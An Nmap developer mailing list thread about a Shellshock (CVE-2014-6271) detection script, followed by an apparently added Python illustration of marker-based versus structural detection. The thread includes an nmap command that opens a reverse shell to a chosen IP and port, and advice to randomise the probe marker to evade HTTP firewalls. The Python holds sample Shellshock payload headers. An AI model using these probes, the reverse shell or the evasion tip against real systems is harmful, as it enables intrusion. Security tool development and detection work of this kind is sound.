Nmap Development mailing list archives
Re: Shell Shock NSE Script (CVE-2014-6271)
From: Jacek Wielemborek <d33tah () gmail com>
Date: Fri, 26 Sep 2014 17:37:58 +0200
On 26.09.2014 at 16:29, Paul AMAR wrote:
Hi list,

I created a NSE script for the Shell Shock vulnerability (CVE-2014-6271). I tested the script with Pentesterlab's VM located here: files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso

This script detects if the host is vulnerable. If so, you get a reverse shell by specifying the right arguments. E.g.:

./nmap -p80 --script http-vuln-cve-2014-6271.nse --script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status <ip> -d

Feel free to send any feedback you have,

Paul

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
Hello Paul,

Nice, looks like you outran me! I was just announcing my version on IRC when it turned out that you already had yours :p

I hope you won't mind a little code review:

1. This script does not contain correct NSEDoc - please take a look here for an example: https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
2. I would use shortport.http for the portrule.
3. We should keep in mind that HTTP firewalls will be looking for any fixed strings in the source. I would replace "NSERocks" with a random string to avoid getting detected so easily.
4. I was thinking that maybe letting the user specify the header to be used instead of User-Agent could make sense as well.
5. "Phone home" is really intrusive and I would suggest making it run only if the user explicitly specifies that this is what she wants. Also, I would turn it into a separate function.

Other than that, I really like this script! Now I guess that it's time for an SSH-based one.

Cheers,
Jacek Wielemborek
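Point 3 above cuts both ways: a filter that keys on the scanner's fixed marker ("NSERocks") misses the same probe with a randomised marker, while a rule that matches the structure of a CVE-2014-6271 header value (a value beginning with an empty shell-function definition, `() {`) catches it regardless of marker. The following Python is an added illustration, not code from the thread or from Nmap; the header samples are constructed for the demonstration.

```python
import re

# Structural signature for a CVE-2014-6271 ("Shellshock") probe: a header
# value that starts with an empty shell-function definition "() {". Bash only
# treated a variable as an imported function when its value began that way,
# so anchoring at the start of the value keeps the rule narrow.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")

# The fixed marker the thread discusses; a naive filter might match only this.
FIXED_MARKER = "NSERocks"

# Constructed sample request headers (not taken from the mailing-list thread).
SAMPLE_HEADERS = [
    ("User-Agent", "() { :;}; echo; echo NSERocks"),           # marker-based probe
    ("User-Agent", "() { :;}; echo; echo 4c1f9ae2b7"),         # randomised marker
    ("Cookie", "() { ignored; }; echo vulnerable"),            # a different header
    ("User-Agent", "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"),  # benign client
]


def fixed_string_rule(value):
    """Naive rule: flag only values containing the known scanner marker."""
    return FIXED_MARKER in value


def structural_rule(value):
    """Flag any header value that begins with a shell function definition."""
    return SHELLSHOCK_RE.search(value) is not None


def classify(headers):
    """Return (header name, fixed-rule hit, structural-rule hit) per header."""
    return [(name, fixed_string_rule(v), structural_rule(v)) for name, v in headers]


if __name__ == "__main__":
    for name, fixed_hit, struct_hit in classify(SAMPLE_HEADERS):
        print(f"{name:10s} fixed={fixed_hit!s:5s} structural={struct_hit}")
```

Only the first sample trips the fixed-string rule; the structural rule flags the first three and leaves the ordinary browser header alone.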